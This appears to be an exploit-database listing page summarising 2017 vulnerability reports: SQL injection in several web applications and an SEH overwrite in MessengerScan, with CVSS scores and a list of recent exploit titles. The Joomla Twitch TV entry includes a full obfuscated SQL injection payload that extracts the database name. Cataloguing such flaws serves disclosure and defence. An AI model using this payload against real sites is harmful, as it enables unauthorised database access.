header-logo
Suggest Exploit
explore-vulnerabilities

Explore Vulnerabilities

Version
Year

Explore all Exploits:

Show More

SOA School Management 3.0 – SQL Injection

The vulnerability allows an attacker to inject sql commands into vulnerable parameters such as drivers/jquery/usersession_exam.php?id=[SQL], drivers/jquery/session_exam.php?id=[SQL], Assignment.php?student_id=[SQL], Fee.php?pay&student_id=7&fee_id=[SQL], YearBook.php?session_id=[SQL], Transaction.php?invoice=[SQL], etc.

8,8
CVSS
HIGH
SQL Injection
89
CWE
Product Name
SOA School Management
Platforms Tested
WiN7_x64/KaLiLinuX_x64
Affected Version
From:
3.0
To:
3.0
2017
Show More

MessengerScan v1.05 Hostname/IP Field SEH/EIP Overwrite POC

MessengerScan v1.05 is vulnerable to SEH/EIP Overwrite POC. The vulnerability is triggered when the contents of the evil.txt file is copied and pasted in the Hostname/IP Field. The SEH chain of main thread is corrupted and the offset to the SEH is 772. The address to the Handler Code is 'B'*4, the junk is 'C'*12 and the address to the EIP is 'D'*4.

7,8
CVSS
HIGH
SEH Overwrite POC
N/A
CWE
Product Name
MessengerScan
Platforms Tested
Windows 7 Ultimate x64bit
Affected Version
From:
1.05
To:
1.05
2017
Show More

Joomla! Component Twitch Tv 1.1 – SQL Injection

The vulnerability allows an attacker to inject sql commands. Proof of Concept: http://localhost/[PATH]/index.php?option=com_twitchtv&view=twitch&username=[SQL] gobgg'++aND(/*!22223SELECT*/+0x30783331+/*!22223FROM*/+(/*!22223SELECT*/+cOUNT(*),/*!22223CONCAT*/((sELECT(sELECT+/*!22223CONCAT*/(cAST(dATABASE()+aS+cHAR),0x7e,0x496873616E53656e63616e))+fROM+iNFORMATION_sCHEMA.tABLES+wHERE+tABLE_sCHEMA=dATABASE()+lIMIT+0,1),fLOOR(rAND(0)*2))x+fROM+iNFORMATION_sCHEMA.tABLES+gROUP+bY+x)a)+aNd+''=' and http://localhost/[PATH]/index.php?option=com_twitchtv&view=gamecenter&id=[SQL]

N/A
CVSS
N/A
SQL Injection
89
CWE
Product Name
Twitch Tv Component
Platforms Tested
WiN7_x64/KaLiLinuX_x64
Affected Version
From:
1.1
To:
1.1
2017
Show More

LiveProjects 1.0 – SQL Injection

The vulnerability allows the users to inject sql commands into the vulnerable parameters of the application. Proof of Concept: http://localhost/[PATH]/index.php?r=pmt/project/project-view&id=[SQL], http://localhost/[PATH]/index.php?r=pmt/task/task-view&id=[SQL], http://localhost/[PATH]/index.php?r=pmt/project/project-view&id=[SQL], etc.

N/A
CVSS
N/A
SQL Injection
89
CWE
Product Name
LiveProjects
Platforms Tested
WiN7_x64/KaLiLinuX_x64
Affected Version
From:
1.0
To:
1.0
2017

Recent Exploits:

RDPGuard 9.9.9 – Privilege Escalation

author
Ahmet Ümit BAYRAM
vendor
RDPGuard
severity
6.1
HIGH

YesWiki Unauthenticated Path Traversal

author
Al Baradi Joy
vendor
YesWiki
severity
7.1
HIGH

ABB Cylon Aspect 3.08.02 Stored Cross-Site Scripting Vulnerability

author
Gjoko 'LiquidWorm' Krstic
vendor
ABB Ltd.
severity
6.1
HIGH

Apache ActiveMQ 6.1.6 – Denial of Service (DOS)

author
Abdualhadi khalifa
vendor
Apache
severity
6.1
HIGH

GeoVision GV-ASManager 6.1.1.0 – CSRF

author
Giorgi Dograshvili [DRAGOWN]
vendor
GeoVision
severity
6.1
HIGH

ABB Cylon FLXeon 9.3.4 WebSocket Command Spawning Vulnerability

author
Zero Science Lab
vendor
ABB Ltd.
severity
6.1
HIGH

GestioIP 3.5.7 – Stored Cross-Site Scripting Vulnerability

author
m4xth0r (Maximiliano Belino)
vendor
GestioIP
severity
6.1
HIGH

Cacti 1.2.26 – Remote Code Execution (RCE) (Authenticated)

author
D3Ext
vendor
Cacti
severity
6.1
HIGH

Exclusive Addons for Elementor ≤ 2.6.9 – Authenticated Stored Cross-Site Scripting (XSS)

author
Al Baradi Joy
vendor
exclusiveaddons
severity
5.1
MEDIUM

Kentico Xperience 13.0.178 – Cross Site Scripting (XSS)

author
Alex Messham
vendor
Kentico
severity
6.1
HIGH

Navigation

Suggest Exploit

Services By CQR